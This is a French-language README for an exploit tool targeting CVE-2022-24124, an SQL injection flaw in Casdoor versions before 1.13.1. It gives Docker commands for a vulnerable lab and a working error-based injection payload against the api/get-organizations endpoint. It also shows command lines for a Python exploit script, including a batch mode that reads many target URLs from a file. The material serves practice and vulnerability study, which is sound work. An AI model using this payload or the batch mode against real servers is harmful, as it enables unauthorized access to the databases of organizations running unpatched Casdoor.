
CVE-2022-24124 exploit
Casdoor est une plateforme d'authentification centralisée à authentification unique (SSO) basée sur OAuth 2.0/OIDC.
Identifiant CVE : CVE-2022-24124
Identifiant CNPD : CNPD-202201-7304
Niveau de risque : Élevé (7.5 HIGH)
POC/EXP : Déjà divulgué
Casdoor < Casdoor 1.13.1 // Toutes les versions antérieures à 1.13.1 sont affectées.
Cette vulnérabilité est une injection SQL. L'API de requête présente une vulnérabilité d'injection SQL liée aux paramètres de champ et de valeur, comme le montre l'API api/get-organizations.
Récupérer l'image de la vulnérabilité
docker pull vulfocus/casdoor:1.13.0

Lancer l'environnement vulnérable
docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

Ouvrir la page de l'environnement vulnérable

Utiliser le POC pour construire le payload
POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

python3 CVE-2022-24124.py -h

python3 CVE-2022-24124.py -u http://127.0.0.1

python3 CVE-2022-24124.py -f urls.txt

https://nvd.nist.gov/vuln/detail/CVE-2022-24124
https://github.com/ColdFusionX/CVE-2022-24124
https://github.com/0xAbbarhSF/CVE-2022-24124
Inspiré de https://www.t00ls.com/thread-66989-1-1.html
J'ai écrit une version Python pour m'entraîner et j'ai ajouté une fonction de détection par lots.